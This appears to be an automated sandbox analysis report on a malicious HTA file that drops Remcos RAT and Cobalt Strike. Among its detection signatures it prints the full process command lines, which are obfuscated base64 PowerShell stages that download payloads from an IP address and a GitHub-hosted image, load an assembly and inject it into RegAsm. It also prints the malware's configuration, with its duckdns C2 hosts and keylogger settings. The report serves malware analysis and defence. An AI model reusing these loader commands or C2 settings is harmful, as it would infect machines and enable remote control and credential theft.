Windows
Analysis Report
nicetokissthebestthingsiwantotgetmebackwith.hta
Overview
General Information
Detection
Cobalt Strike, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc.)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality for reading data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 1848 cmdline: mshta.exe "C:\Users\user\Desktop\nicetokissthebestthingsiwantotgetmebackwith.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- powershell.exe (PID: 4408 cmdline:
"C:\Window s\sysTEM32 \WInDOwSpo WershELL\v 1.0\pOWERS HELl.EXE" "pOweRSHel l.eXE -eX ByPASS -nOp -W 1 -C DeviC EcreDentIA LDePLoymEN t.Exe ; ie X($(iEx('[ sYstem.teX T.EnCodiNg ]'+[CHaR]0 X3A+[ChAr] 0X3a+'utf8 .geTStRIng ([SYSTem.c onVeRT]'+[ cHar]0X3a+ [cHAr]0x3a +'fRoMbAse 64STRINg(' +[chAr]0x2 2+'JFo4ViA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gPSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgYUREL XRZcGUgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIC1 tRU1CRVJER WZJTmlUaW9 uICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAnW0Rsb EltcG9ydCg idVJMTU9OL mRMTCIsICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB DaGFyU2V0I D0gQ2hhclN ldC5Vbmljb 2RlKV1wdWJ saWMgc3Rhd GljIGV4dGV ybiBJbnRQd HIgVVJMRG9 3bmxvYWRUb 0ZpbGUoSW5 0UHRyICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBrR lJJT2lCTCx zdHJpbmcgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI G9DWWksc3R yaW5nICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBvc UxvWVAsdWl udCAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgTUR1a nZLSyxJbnR QdHIgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIENJW W9nV3RNZXI pOycgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIC1OY W1FICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAicXJ Va0NtTXZhT kgiICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAtbmF NZVNwQUNFI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBYZEJMQnd 6U21nZSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL VBhc3NUaHJ 1OyAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgJFo4V jo6VVJMRG9 3bmxvYWRUb 0ZpbGUoMCw iaHR0cDovL zEwNy4xNzU uMjI5LjEzO C81NTAvc2V ldGhlYmVzd HBpY3R1cmV 3aXRoZ3JlY XR0aGluZ3N pbmxpbmVhb HdheXMudEl GIiwiJEVud jpBUFBEQVR BXHNlZXRoZ WJlc3RwaWN 0dXJld2l0a GdyZWF0dGh pbmdzaW5sa W5lYS52YlM iLDAsMCk7c 1RhcnQtU0x FZVAoMyk7U 3RhclQgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICI kZW52OkFQU ERBVEFcc2V ldGhlYmVzd HBpY3R1cmV 3aXRoZ3JlY XR0aGluZ3N pbmxpbmVhL nZiUyI='+[ char]34+') )')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 2792 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 940 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- csc.exe (PID: 4308 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
- cvtres.exe (PID: 1532 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE985.tmp" "c:\Users\user\AppData\Local\Temp\1nlzjhnh\CSC4E5E770DE006429A8ABEBD72CF3EF132.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
- wscript.exe (PID: 1396 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
- powershell.exe (PID: 1732 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LiggJFNoRU xMSWRbMV0r JHNoRWxMSU RbMTNdKydY JykoICgoJ3 sxfWltYWdl VXJsID0gez B9aHR0cHM6 Ly9yYXcuZ2 l0aHVidXNl cmNvbnRlbn QuY29tL0Ny eXB0ZXJzQW 5kVG9vbHNP ZicrJ2ljaW FsL1pJUC9y ZWZzL2hlYW RzL21haW4v RGV0YWhOb3 RlX1YuanBn IHswfTt7MX 13ZWJDbGll bnQgPSBOZX ctT2JqZWN0 IFN5c3RlbS 5OZXQuV2Vi Q2xpZW50O3 snKycxfWlt YWdlQnl0ZX MgPSB7MX0n Kyd3ZWJDbG llbnQuRG8n Kyd3bmxvYW REYXRhKHsx fWltYWdlVX JsKTt7MX1p bWFnZVRleH QgPSBbUycr J3lzdGVtLl RleHQuRW5j bycrJ2Rpbm ddOjpVVEY4 LkdldFN0cm luZyh7MX1p bWFnZUJ5dG VzKTt7MX1z dGFydEZsYW cgPSB7MH08 PEJBU0U2NF 9TVEFSVCcr Jz4+ezB9O3 sxfWVuZEZs YWcgPSB7MH 08PEJBU0U2 NF9FTkQ+Pn swfTt7MX1z dGFydEluZG V4ID0gezF9 aW1hZ2VUZX h0LkluZGV4 T2YoezF9c3 RhcnRGbGFn KTt7MX1lbm RJbmRleCA9 IHsxfWknKy dtYWdlVGV4 dC5JbmRlJy sneCcrJ09m KHsxfWVuJy snZEZsYWcp O3sxfXN0YX J0SW5kZXgg LWdlIDAgLW FuZCB7MX1l bmRJbmRleC AtZycrJ3Qn KycgezF9cy crJ3RhcnRJ bmRleDt7MX 1zdGFydElu ZGV4ICs9IH sxfXN0YXJ0 RmxhZy5MZW 5ndGg7ezF9 YmFzZTY0TG VuZ3RoID0g ezF9ZW5kSW 5kZXggLSB7 MX1zdGFydE luZGV4O3sx fWJhc2U2NE NvbW1hbmQg PSB7MX1pbW FnZVRleHQu U3Vic3RyaW 5nKHsxfXN0 YXJ0SW5kZX gsIHsxfWJh c2U2NExlbm d0aCk7ezF9 Y29tbWFuZE J5dGVzID0g W1N5c3RlbS 5Db252ZXJ0 XTo6RnJvbU Jhc2U2NFN0 cmluZygnKy d7MX1iYXNl NjRDb21tYW 5kKTt7MX1s b2FkZWRBc3 NlbWJseSA9 IFtTeXN0ZW 0uUmVmbGVj dGlvbi5Bc3 NlbWJseV0n Kyc6OkxvYW QoezF9Y29t bWFuZEJ5dG VzKScrJzt7 MX12YWlNZX Rob2QgPSBb ZG5sJysnaW IuSU8uSG9t ZV0uR2V0TW V0aG9kKHsw fVZBSXswfS k7ezF9dmFp TWV0aG9kLk ludm9rZSh7 MX1udWxsLC BAKHswfXR4 dC5SRENDTk 0vMDU1Lzgz MS45MjIuNT cxLjcwMS8v OnB0dGh7MH 0sIHswfWRl cycrJ2F0aX ZhZG97MH0s IHswfWRlc2 F0aXZhZG97 MCcrJ30sIH swfWRlc2F0 aXZhZG97MH 0sIHswfVJl Z0FzbScrJ3 swfSwgezB9 ZGVzYXRpdm Fkb3swfSwg ezB9ZGVzYX RpdmFkb3sw fSkpOycpIC AtRltjaEFS XTM5LFtjaE FSXTM2KSAp ';$OWjuxd = [system. 
Text.encod ing]::UTF8 .GetString ([system.C onvert]::F rombase64S tring($cod igo));powe rshell.exe -windowst yle hidden -executio npolicy by pass -NoPr ofile -com mand $OWju xD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 2364 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 1476 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ".( $S hELLId[1]+ $shElLID[1 3]+'X')( ( ('{1}image Url = {0}h ttps://raw .githubuse rcontent.c om/Crypter sAndToolsO f'+'icial/ ZIP/refs/h eads/main/ DetahNote_ V.jpg {0}; {1}webClie nt = New-O bject Syst em.Net.Web Client;{'+ '1}imageBy tes = {1}' +'webClien t.Do'+'wnl oadData({1 }imageUrl) ;{1}imageT ext = [S'+ 'ystem.Tex t.Enco'+'d ing]::UTF8 .GetString ({1}imageB ytes);{1}s tartFlag = {0}<<BASE 64_START'+ '>>{0};{1} endFlag = {0}<<BASE6 4_END>>{0} ;{1}startI ndex = {1} imageText. IndexOf({1 }startFlag );{1}endIn dex = {1}i '+'mageTex t.Inde'+'x '+'Of({1}e n'+'dFlag) ;{1}startI ndex -ge 0 -and {1}e ndIndex -g '+'t'+' {1 }s'+'tartI ndex;{1}st artIndex + = {1}start Flag.Lengt h;{1}base6 4Length = {1}endInde x - {1}sta rtIndex;{1 }base64Com mand = {1} imageText. Substring( {1}startIn dex, {1}ba se64Length );{1}comma ndBytes = [System.Co nvert]::Fr omBase64St ring('+'{1 }base64Com mand);{1}l oadedAssem bly = [Sys tem.Reflec tion.Assem bly]'+'::L oad({1}com mandBytes) '+';{1}vai Method = [ dnl'+'ib.I O.Home].Ge tMethod({0 }VAI{0});{ 1}vaiMetho d.Invoke({ 1}null, @( {0}txt.RDC CNM/055/83 1.922.571. 701//:ptth {0}, {0}de s'+'ativad o{0}, {0}d esativado{ 0'+'}, {0} desativado {0}, {0}Re gAsm'+'{0} , {0}desat ivado{0}, {0}desativ ado{0}));' ) -F[chAR] 39,[chAR]3 6) )" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - RegAsm.exe (PID: 5940 cmdline:
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- RegAsm.exe (PID: 6412 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwva" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- RegAsm.exe (PID: 5412 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- RegAsm.exe (PID: 2000 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- RegAsm.exe (PID: 6512 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- RegAsm.exe (PID: 4564 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xsnewtbsktv" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link
---|---|---|---|---
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity. | | |
{"Host:Port:Password": ["danbana.duckdns.org:9674:1", "danbana.duckdns.org:9764:1", "dantata.duckdns.org:9764:1", "dantata.duckdns.org:9674:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UCDCW8", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
| Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| REMCOS_RAT_variants | unknown | unknown |

(5 of 27 entries shown)

Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
| Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| REMCOS_RAT_variants | unknown | unknown |

(5 of 18 entries shown)

Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |